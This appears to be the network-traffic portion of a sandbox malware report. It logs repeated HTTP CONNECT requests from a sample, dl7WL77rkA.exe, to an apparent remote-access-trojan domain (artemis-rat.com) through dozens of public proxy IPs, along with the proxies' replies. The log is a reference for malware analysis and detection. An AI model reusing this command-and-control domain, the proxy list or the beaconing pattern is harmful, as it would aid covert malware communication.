                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2129192.168.2.555456192.252.208.70142823876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:50.894401073 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2130192.168.2.55549445.11.95.16560103876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:50.894615889 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2131192.168.2.55503968.169.59.17183803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:50.895031929 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:53.905105114 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:56.921629906 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2132192.168.2.55284845.117.179.17965223876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:50.895245075 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2133192.168.2.552889173.212.209.216271383876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:50.901482105 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:53.905106068 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:56.921634912 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:03.010822058 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2134192.168.2.55499931.148.7.13031283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:50.904371023 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2135192.168.2.554981201.149.127.2280803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:50.904512882 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:01.273437977 CET | 202 | IN | HTTP/1.0 404 Not Found
Content-Length: 718
Content-Type: text/html
Date: Mon, 11 Mar 2024 02:31:01 GMT
Expires: Mon, 11 Mar 2024 02:31:01 GMT
Server: Mikrotik HttpProxy
Proxy-Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2136192.168.2.55508961.7.149.480803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:50.945147038 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.381443977 CET | 19 | IN | HTTP/1.1 200 OK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2137192.168.2.554914117.160.250.16399903876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:50.945147038 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.701975107 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:55.592717886 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:56.270524025 CET | 303 | IN | HTTP/1.1 400 Bad Request
Server: openresty
Date: Mon, 11 Mar 2024 02:30:56 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
Mar 11, 2024 03:30:59.269891977 CET | 303 | IN | HTTP/1.1 400 Bad Request
Server: openresty
Date: Mon, 11 Mar 2024 02:30:56 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
Mar 11, 2024 03:31:05.269589901 CET | 303 | IN | HTTP/1.1 400 Bad Request
Server: openresty
Date: Mon, 11 Mar 2024 02:30:56 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
Mar 11, 2024 03:31:17.269341946 CET | 303 | IN | HTTP/1.1 400 Bad Request
Server: openresty
Date: Mon, 11 Mar 2024 02:30:56 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
Mar 11, 2024 03:31:41.270391941 CET | 303 | IN | HTTP/1.1 400 Bad Request
Server: openresty
Date: Mon, 11 Mar 2024 02:30:56 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
Mar 11, 2024 03:32:29.271441936 CET | 303 | IN | HTTP/1.1 400 Bad Request
Server: openresty
Date: Mon, 11 Mar 2024 02:30:56 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2138192.168.2.551350142.54.237.3441453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:50.945194960 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2139192.168.2.552875202.74.48.6610883876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:50.945312023 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2140192.168.2.55299291.142.222.84570413876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:51.066212893 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2141192.168.2.55301892.205.110.47171583876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:51.112971067 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2142192.168.2.55303491.229.28.10531283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:51.128144026 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2143192.168.2.55515438.54.16.97803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:51.129633904 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.484189987 CET | 176 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:51 GMT
                                                                                                                                                                                                                                                            Content-Length: 19
                                                                                                                                                                                                                                                            Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                                                                                                                                                            Data Ascii: 404 page not found


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2144192.168.2.555152188.255.220.11066663876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:51.129906893 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.561959982 CET | 202 | IN | HTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 719
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Wed, 14 Feb 2024 22:22:06 GMT
                                                                                                                                                                                                                                                            Expires: Wed, 14 Feb 2024 22:22:06 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2145192.168.2.552997213.165.168.19098983876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:51.134079933 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2146192.168.2.55497751.155.10.080003876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:51.142860889 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2147192.168.2.55315674.208.12.35431003876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:51.156254053 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2148192.168.2.553141167.99.236.14803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:51.172750950 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:54.202070951 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:57.217277050 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.217505932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2149192.168.2.55316092.204.135.37204913876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.173943996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2150192.168.2.55504072.195.34.5941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.178560972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2151192.168.2.55528545.67.210.4733893876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.186553955 CET131INHTTP/1.1 503 Too many open connections
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0a
                                                                                                                                                                                                                                                            Data Ascii: Maximum number of open connections reached.
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.353976011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2152192.168.2.553238186.46.34.209993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.218446016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.624736071 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2153192.168.2.553260178.33.163.15675793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.218508005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.389256001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.405328989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.405430079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2154192.168.2.553253200.39.154.19993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.218724012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2155192.168.2.553221146.59.18.246409753876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.218945026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.389271021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.405328989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2156192.168.2.553072185.189.100.20080803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.223484039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:01.615470886 CET202INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 715
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Expires: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2157192.168.2.55151264.56.150.10231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.223490953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2158192.168.2.55516814.241.203.4656783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.259402990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
